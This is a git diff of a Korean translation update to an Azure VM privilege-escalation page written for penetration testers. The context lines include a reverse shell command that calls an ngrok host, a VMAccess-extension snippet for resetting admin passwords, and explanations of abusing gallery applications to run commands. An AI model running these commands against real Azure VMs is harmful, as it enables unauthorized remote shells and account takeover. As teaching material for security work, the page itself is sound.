Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

This commit is contained in:
Translator
2025-02-12 14:27:12 +00:00
parent 143de50aaf
commit 08d8246cf6
@@ -12,13 +12,13 @@ Azure Virtual Machines 및 Network에 대한 자세한 정보는 다음을 확
### **`Microsoft.Compute/virtualMachines/extensions/write`**
이 권한은 가상 머신에서 확장을 실행할 수 있게 하며, 이를 통해 **임의의 코드를 실행할 수 있니다**.\
이 권한은 가상 머신에서 확장을 실행할 수 있게 하 **임의의 코드를 실행할 수 있게 합니다**.\
VM에서 임의의 명령을 실행하기 위해 사용자 정의 확장을 악용하는 예:
{{#tabs }}
{{#tab name="Linux" }}
- 리버스 실행
- 리버스 실행
```bash
# Prepare the rev shell
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -91,9 +91,9 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
<details>
<summary>VMAccess 확장</summary>
<summary>VMAccess extension</summary>
이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않 경우 생성)할 수 있게 해줍니다.
이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않 경우 생성)할 수 있게 해줍니다.
```bash
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
@@ -157,13 +157,13 @@ Set-AzVMDscExtension `
<summary>하이브리드 런북 워커</summary>
이것은 자동화 계정에서 VM에서 런북을 실행할 수 있도록 하는 VM 확장입니다. 더 많은 정보는 [Automation Accounts service](../az-services/az-automation-account/index.html)를 확인하세요.
이것은 자동화 계정에서 VM에서 런북을 실행할 수 있도록 하는 VM 확장입니다. 자세한 내용은 [Automation Accounts service](../az-services/az-automation-account/index.html)를 확인하세요.
</details>
### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)`
이것들은 **새로운 갤러리 애플리케이션을 생성하고 VM 내에서 실행하기 위 권한**입니다. 갤러리 애플리케이션은 무엇이든 실행할 수 있으므로 공격자는 이를 악용하여 임의의 명령을 실행하는 VM 인스턴스를 손상시킬 수 있습니다.
이것들은 **새 갤러리 애플리케이션을 생성하고 VM 내에서 실행하기 위요한 권한**입니다. 갤러리 애플리케이션은 무엇이든 실행할 수 있으므로 공격자는 이를 악용하여 임의의 명령을 실행하는 VM 인스턴스를 손상시킬 수 있습니다.
마지막 2개의 권한은 애플리케이션을 테넌트와 공유함으로써 회피할 수 있습니다.
@@ -351,6 +351,6 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 액세스를 제공하여 VM을 제어할 수 있는 것처럼 보입니다...
[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리자 권한으로 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 접근을 제공하여 VM을 제어할 수 있게 하는 것 같습니다...
{{#include ../../../banners/hacktricks-training.md}}